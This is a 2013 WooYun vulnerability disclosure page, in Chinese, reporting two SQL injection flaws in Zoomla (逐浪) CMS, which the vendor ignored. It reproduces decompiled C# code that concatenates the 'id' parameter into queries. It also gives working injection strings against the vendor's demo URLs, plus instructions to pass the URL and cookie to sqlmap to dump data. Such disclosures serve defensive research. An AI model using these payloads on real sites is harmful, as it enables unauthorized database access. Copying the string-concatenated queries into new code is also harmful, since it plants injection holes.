当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2013-046434
漏洞标题:
逐浪CMS通用型SQL注入8+9(select型)
相关厂商:
逐浪CMS
漏洞作者:
wefgod
提交时间:
2013-12-19 11:58
修复时间:
2013-12-24 11:59
公开时间:
2013-12-24 11:59
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
1
漏洞状态:
漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2013-12-19: 细节已通知厂商并且等待厂商处理中
1970-01-01: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
1970-02-25: 细节向核心白帽子及相关领域专家公开
1970-03-07: 细节向普通白帽子公开
1970-03-17: 细节向实习白帽子公开
2013-12-24: 细节向公众公开

简要描述:

似乎逐浪开始想完全闭源了。已经准备阻止大家进行反编译了,暂时还不知道是用什么方法,以后如果研究出来的话再说吧。所以官方别再扯什么XXX源码包了,不开源不是丢人的事情,但是忽悠客户不是很好吧。

详细说明:

相关的类:
public class MIS_Target_planList : Page, IRequiresSessionState
public class MIS_Target_ProList : Page, IRequiresSessionState

漏洞证明:

注入点1:

public class MIS_Target_planList : Page, IRequiresSessionState
    protected void Page_Load(object sender, EventArgs e)
    {
        this.buser.CheckIsLogin();
        if (!base.IsPostBack && !string.IsNullOrEmpty(base.Request["id"]))
        {
            this.id = DataConverter.CLng(base.Request["id"]);  //id参数第一次过滤了
            this.dt = this.bll.Sel("MID =" + base.Request["id"], "ID desc"); //id参数第二次直接带入查询中了
            if (this.dt != null && this.dt.Rows.Count > 0)
            {
                this.Repeater3.DataSource = this.dt;
                this.Repeater3.DataBind();
            }
        }
    }


前台注册用户。
http://demo.zoomla.cn/Mis/Plan/AddPlan.aspx
添加计划
访问http://demo.zoomla.cn/mis/target/planList.aspx?id=0
可以看见计划都列出来了,把上面这个URL丢到工具里面,带上cookie即可:

20131219114858.jpg


注入点2:

public class MIS_Target_ProList : Page, IRequiresSessionState
    protected global_asax ApplicationInstance
    {
        get
        {
            return (global_asax)this.Context.ApplicationInstance;
        }
    }
    protected void Page_Load(object sender, EventArgs e)
    {
        this.buser.CheckIsLogin();
        if (!base.IsPostBack && !string.IsNullOrEmpty(base.Request["types"]) && base.Request["types"].ToString() == "7" && !string.IsNullOrEmpty(base.Request["id"]))
        {
            this.id = DataConverter.CLng(base.Request["id"]);
            this.dt = this.bll.Sel("TargetID like '%" + base.Request["id"] + "%' And IsSystem=0 ", "ID desc"); //id参数没有过滤就带入SQL查询
            if (this.dt != null && this.dt.Rows.Count > 0)
            {
                this.Repeater3.DataSource = this.dt;
                this.Repeater3.DataBind();
            }
        }
    }


注册前台用户并登录
http://demo.zoomla.cn/Mis/Project/Default.aspx
点击新建项目
随意新建一个项目。
打开http://demo.zoomla.cn/mis/target/prolist.aspx?types=7&id=3
页面空白
打开http://demo.zoomla.cn/mis/target/prolist.aspx?types=7&id=3%' or '%'='
所有添加的项目信息都在里面
把下面的链接还有cookie丢sqlmap就可以暴数据了
http://demo.zoomla.cn/mis/target/prolist.aspx?types=7&id=3%' or '1'='1'*--

20131219115410.jpg


20131219115424.jpg

修复方案:

过滤

版权声明:转载请注明来源 wefgod@乌云

>

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-12-24 11:59

厂商回复:

最新状态:

暂无